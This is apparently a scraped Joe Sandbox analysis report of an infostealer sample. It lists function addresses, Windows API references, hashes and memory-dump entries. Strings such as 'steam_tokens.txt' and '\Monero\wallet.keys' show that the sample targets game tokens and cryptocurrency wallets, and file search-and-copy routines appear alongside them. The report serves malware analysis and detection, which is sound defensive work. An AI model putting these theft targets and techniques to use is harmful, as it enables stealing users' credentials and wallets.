String ID: steam_tokens.txt
API String ID: 2001356338-401951677
Opcode ID: 6cb55bcf120401f3c2cac942b043e3f113f84ecbd224d9783176ce48d37b0e59
Instruction ID: 1618b3971e32fd86157a54ad8ff80582c8a1ecbfe7a90ff799a86612b4c31f1d
Opcode Fuzzy Hash: 6cb55bcf120401f3c2cac942b043e3f113f84ecbd224d9783176ce48d37b0e59
Instruction Fuzzy Hash: 98F0FB7191010876DB18FBA8DC96AED733CFA54340F404168B456E6692EF346609C6A7

Function 008B7ED0 Relevance: 3.0, APIs: 2, Instructions: 34COMMON

Download Yara Rule

APIs

GetSystemInfo.KERNEL32(008C0E2C), ref: 008B7F00
wsprintfA.USER32 ref: 008B7F16

Memory Dump Source

Source File: 00000000.00000002.1978609767.00000000008A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.1978592480.00000000008A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000008FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000925000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000928000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.000000000092F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000932000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000951000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.000000000095D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000982000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.000000000098F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000009AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000009BB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000009BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000A45000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000A65000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000A6B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000AEA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000AFE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000C87000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D64000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D85000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D8D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D9D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979303253.0000000000D9E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979427856.0000000000F3C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979449001.0000000000F3D000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_file.jbxd

Yara matches

Similarity

API ID: InfoSystemwsprintf
String ID:
API String ID: 2452939696-0
Opcode ID: 0bc752899c5952a69b0b660dbb5823cdf1b4e6ada4804592391ac089cfcb0d33
Instruction ID: da30f9115151b98c73270a4023c6e198588db72cd0a675be0e0aa228b68518e8
Opcode Fuzzy Hash: 0bc752899c5952a69b0b660dbb5823cdf1b4e6ada4804592391ac089cfcb0d33
Instruction Fuzzy Hash: 0EF06DB1A04258EBCB14CF84DC45FAAB7BCFB48B24F000669F515E2380D77969048BE5

Function 008AB4F0 Relevance: 2.9, APIs: 2, Instructions: 397stringCOMMON

Download Yara Rule

APIs

Part of subcall function 008BA740: lstrcpy.KERNEL32(008C0E17,00000000), ref: 008BA788

Part of subcall function 008BA9B0: lstrlen.KERNEL32(?,01278E88,?,\Monero\wallet.keys,008C0E17), ref: 008BA9C5
Part of subcall function 008BA9B0: lstrcpy.KERNEL32(00000000), ref: 008BAA04
Part of subcall function 008BA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 008BAA12

Part of subcall function 008BA920: lstrcpy.KERNEL32(00000000,?), ref: 008BA972
Part of subcall function 008BA920: lstrcat.KERNEL32(00000000), ref: 008BA982

Part of subcall function 008BA8A0: lstrcpy.KERNEL32(?,008C0E17), ref: 008BA905

Part of subcall function 008BA7A0: lstrcpy.KERNEL32(?,00000000), ref: 008BA7E6

lstrlen.KERNEL32(00000000), ref: 008AB9C2
lstrlen.KERNEL32(00000000), ref: 008AB9D6

Memory Dump Source

Source File: 00000000.00000002.1978609767.00000000008A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.1978592480.00000000008A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000008FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000925000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000928000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.000000000092F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000932000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000951000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.000000000095D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000982000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.000000000098F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000009AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000009BB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000009BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000A45000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000A65000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000A6B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000AEA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000AFE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000C87000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D64000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D85000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D8D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D9D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979303253.0000000000D9E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979427856.0000000000F3C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979449001.0000000000F3D000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen$lstrcat
String ID:
API String ID: 2500673778-0
Opcode ID: f8fbb6a5a0808aca6e2eb08f194aef8e72ea2d51c372e72188a7354f9819e699
Instruction ID: b9180953b60aa391f978368115d9c97ceceb374b13e31701cbbd45ea95bddd19
Opcode Fuzzy Hash: f8fbb6a5a0808aca6e2eb08f194aef8e72ea2d51c372e72188a7354f9819e699
Instruction Fuzzy Hash: 53E1D272910118ABDB19EBA4CCD6EEE7338FF54300F404169F516E66A1EF346A49CB63

Function 008AAEF0 Relevance: 2.7, APIs: 2, Instructions: 236stringCOMMON

Download Yara Rule

APIs

Part of subcall function 008BA740: lstrcpy.KERNEL32(008C0E17,00000000), ref: 008BA788

Part of subcall function 008BA9B0: lstrlen.KERNEL32(?,01278E88,?,\Monero\wallet.keys,008C0E17), ref: 008BA9C5
Part of subcall function 008BA9B0: lstrcpy.KERNEL32(00000000), ref: 008BAA04
Part of subcall function 008BA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 008BAA12

Part of subcall function 008BA920: lstrcpy.KERNEL32(00000000,?), ref: 008BA972
Part of subcall function 008BA920: lstrcat.KERNEL32(00000000), ref: 008BA982

Part of subcall function 008BA8A0: lstrcpy.KERNEL32(?,008C0E17), ref: 008BA905

lstrlen.KERNEL32(00000000), ref: 008AB16A
lstrlen.KERNEL32(00000000), ref: 008AB17E

Part of subcall function 008BA7A0: lstrcpy.KERNEL32(?,00000000), ref: 008BA7E6

Memory Dump Source

Source File: 00000000.00000002.1978609767.00000000008A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.1978592480.00000000008A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000008FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000925000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000928000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.000000000092F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000932000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000951000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.000000000095D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000982000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.000000000098F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000009AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000009BB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000009BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000A45000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000A65000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000A6B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000AEA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000AFE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000C87000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D64000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D85000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D8D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D9D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979303253.0000000000D9E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979427856.0000000000F3C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979449001.0000000000F3D000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen$lstrcat
String ID:
API String ID: 2500673778-0
Opcode ID: 2ff74e32ff3be5e1d832d95895ac71e332576fb61bb7aece62631a63828a322f
Instruction ID: 2e3441f0b9785c299e0cfae0f09f15272daa85d50a794d3371ddd6ff53abea2d
Opcode Fuzzy Hash: 2ff74e32ff3be5e1d832d95895ac71e332576fb61bb7aece62631a63828a322f
Instruction Fuzzy Hash: F7910372910118ABDB18EBA4DCE5DEE7738FF54300F404169F516E66A1EF346A09CB63

Function 008AB230 Relevance: 2.7, APIs: 2, Instructions: 205stringCOMMON

Download Yara Rule

APIs

Part of subcall function 008BA740: lstrcpy.KERNEL32(008C0E17,00000000), ref: 008BA788

Part of subcall function 008BA9B0: lstrlen.KERNEL32(?,01278E88,?,\Monero\wallet.keys,008C0E17), ref: 008BA9C5
Part of subcall function 008BA9B0: lstrcpy.KERNEL32(00000000), ref: 008BAA04
Part of subcall function 008BA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 008BAA12

Part of subcall function 008BA920: lstrcpy.KERNEL32(00000000,?), ref: 008BA972
Part of subcall function 008BA920: lstrcat.KERNEL32(00000000), ref: 008BA982

Part of subcall function 008BA8A0: lstrcpy.KERNEL32(?,008C0E17), ref: 008BA905

lstrlen.KERNEL32(00000000), ref: 008AB42E
lstrlen.KERNEL32(00000000), ref: 008AB442

Part of subcall function 008BA7A0: lstrcpy.KERNEL32(?,00000000), ref: 008BA7E6

Memory Dump Source

Source File: 00000000.00000002.1978609767.00000000008A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.1978592480.00000000008A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000008FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000925000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000928000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.000000000092F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000932000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000951000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.000000000095D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000982000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.000000000098F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000009AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000009BB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000009BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000A45000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000A65000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000A6B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000AEA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000AFE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000C87000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D64000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D85000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D8D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D9D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979303253.0000000000D9E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979427856.0000000000F3C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979449001.0000000000F3D000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen$lstrcat
String ID:
API String ID: 2500673778-0
Opcode ID: 279e31b50a44981087a5ad3134540c2294223a80a2330770c5b0ce34e0da509f
Instruction ID: 0ec8a5aba739960b12c16d2e8341d5f97cf9fcf5a456c496665169ea959eb670
Opcode Fuzzy Hash: 279e31b50a44981087a5ad3134540c2294223a80a2330770c5b0ce34e0da509f
Instruction Fuzzy Hash: 1271E271910118AADB18EBA8DCE6DEE7778FF54300F404528F516E66A1EF346A09CB63

Function 008B4BB0 Relevance: 2.6, APIs: 2, Instructions: 118stringCOMMON

Download Yara Rule

APIs

Part of subcall function 008B8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 008B8E0B

lstrcat.KERNEL32(?,00000000), ref: 008B4BEA
lstrcat.KERNEL32(?,0127DA78), ref: 008B4C08

Part of subcall function 008B4910: wsprintfA.USER32 ref: 008B492C
Part of subcall function 008B4910: FindFirstFileA.KERNEL32(?,?), ref: 008B4943

Part of subcall function 008B4910: StrCmpCA.SHLWAPI(?,008C0FDC), ref: 008B4971
Part of subcall function 008B4910: StrCmpCA.SHLWAPI(?,008C0FE0), ref: 008B4987
Part of subcall function 008B4910: FindNextFileA.KERNEL32(000000FF,?), ref: 008B4B7D
Part of subcall function 008B4910: FindClose.KERNEL32(000000FF), ref: 008B4B92

Part of subcall function 008B4910: wsprintfA.USER32 ref: 008B49B0
Part of subcall function 008B4910: StrCmpCA.SHLWAPI(?,008C08D2), ref: 008B49C5
Part of subcall function 008B4910: wsprintfA.USER32 ref: 008B49E2
Part of subcall function 008B4910: PathMatchSpecA.SHLWAPI(?,?), ref: 008B4A1E
Part of subcall function 008B4910: lstrcat.KERNEL32(?,0127E9D0), ref: 008B4A4A
Part of subcall function 008B4910: lstrcat.KERNEL32(?,008C0FF8), ref: 008B4A5C
Part of subcall function 008B4910: lstrcat.KERNEL32(?,?), ref: 008B4A70
Part of subcall function 008B4910: lstrcat.KERNEL32(?,008C0FFC), ref: 008B4A82
Part of subcall function 008B4910: lstrcat.KERNEL32(?,?), ref: 008B4A96
Part of subcall function 008B4910: CopyFileA.KERNEL32(?,?,00000001), ref: 008B4AAC
Part of subcall function 008B4910: DeleteFileA.KERNEL32(?), ref: 008B4B31

Part of subcall function 008B4910: wsprintfA.USER32 ref: 008B4A07

Memory Dump Source

Source File: 00000000.00000002.1978609767.00000000008A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.1978592480.00000000008A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000008FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000925000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000928000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.000000000092F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000932000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000951000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.000000000095D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000982000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.000000000098F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000009AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000009BB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000009BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000A45000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000A65000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000A6B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000AEA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000AFE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000C87000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D64000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D85000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D8D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D9D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979303253.0000000000D9E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979427856.0000000000F3C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979449001.0000000000F3D000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_file.jbxd

Yara matches

Similarity

API ID: lstrcat$Filewsprintf$Find$Path$CloseCopyDeleteFirstFolderMatchNextSpec
String ID:
API String ID: 2104210347-0
Opcode ID: a1734560742b3c3b0c806e40c728ed6caf93381bf18e5cc40f25035337c3f29d
Instruction ID: de1df2ba0da7c0115a0ee953f0a1b9341b0ced73d546b1c450851fbe68bc236a
Opcode Fuzzy Hash: a1734560742b3c3b0c806e40c728ed6caf93381bf18e5cc40f25035337c3f29d
Instruction Fuzzy Hash: 4E41B67B900104A7DB54E7E4EC82EEE337DF795300F008508B556DA686ED75AB898B93

Function 008A6660 Relevance: 2.6, APIs: 2, Instructions: 95memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(?,?,00003000,00000040), ref: 008A6706
VirtualAlloc.KERNEL32(00000000,?,00003000,00000040), ref: 008A6753

Memory Dump Source

Source File: 00000000.00000002.1978609767.00000000008A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.1978592480.00000000008A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000008FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000925000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000928000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.000000000092F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000932000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000951000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.000000000095D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000982000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.000000000098F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000009AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000009BB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000009BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000A45000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000A65000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000A6B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000AEA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000AFE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000C87000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D64000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D85000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D8D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D9D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979303253.0000000000D9E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979427856.0000000000F3C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979449001.0000000000F3D000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_file.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 178a4cfa52fe650000157d53dd0f9b077140d428baef3885bc311363afc58d0c
Instruction ID: 7227d5fb6edc9c398c892fc92c63e8d8d5e0c31ed5469a27d48b496d443e4271
Opcode Fuzzy Hash: 178a4cfa52fe650000157d53dd0f9b077140d428baef3885bc311363afc58d0c
Instruction Fuzzy Hash: A9410C74A00208EFDB44CF98C494BADBBB1FF58314F2482A9E9099B745D731EA91CF84

Function 008B5050 Relevance: 2.5, APIs: 2, Instructions: 48stringCOMMON

Download Yara Rule

APIs

Part of subcall function 008B8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 008B8E0B

lstrcat.KERNEL32(?,00000000), ref: 008B508A
lstrcat.KERNEL32(?,0127E2A8), ref: 008B50A8

Part of subcall function 008B4910: wsprintfA.USER32 ref: 008B492C
Part of subcall function 008B4910: FindFirstFileA.KERNEL32(?,?), ref: 008B4943

Memory Dump Source

Source File: 00000000.00000002.1978609767.00000000008A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.1978592480.00000000008A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000008FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000925000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000928000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.000000000092F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000932000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000951000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.000000000095D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000982000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.000000000098F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000009AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000009BB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000009BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000A45000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000A65000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000A6B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000AEA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000AFE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000C87000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D64000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D85000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D8D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D9D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979303253.0000000000D9E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979427856.0000000000F3C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979449001.0000000000F3D000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_file.jbxd

Yara matches

Similarity

API ID: lstrcat$FileFindFirstFolderPathwsprintf
String ID:
API String ID: 2699682494-0
Opcode ID: 153c93ea07b6f1fbb4d218468b560e3e9c8b7d371fd293ccf85f86fc42739704
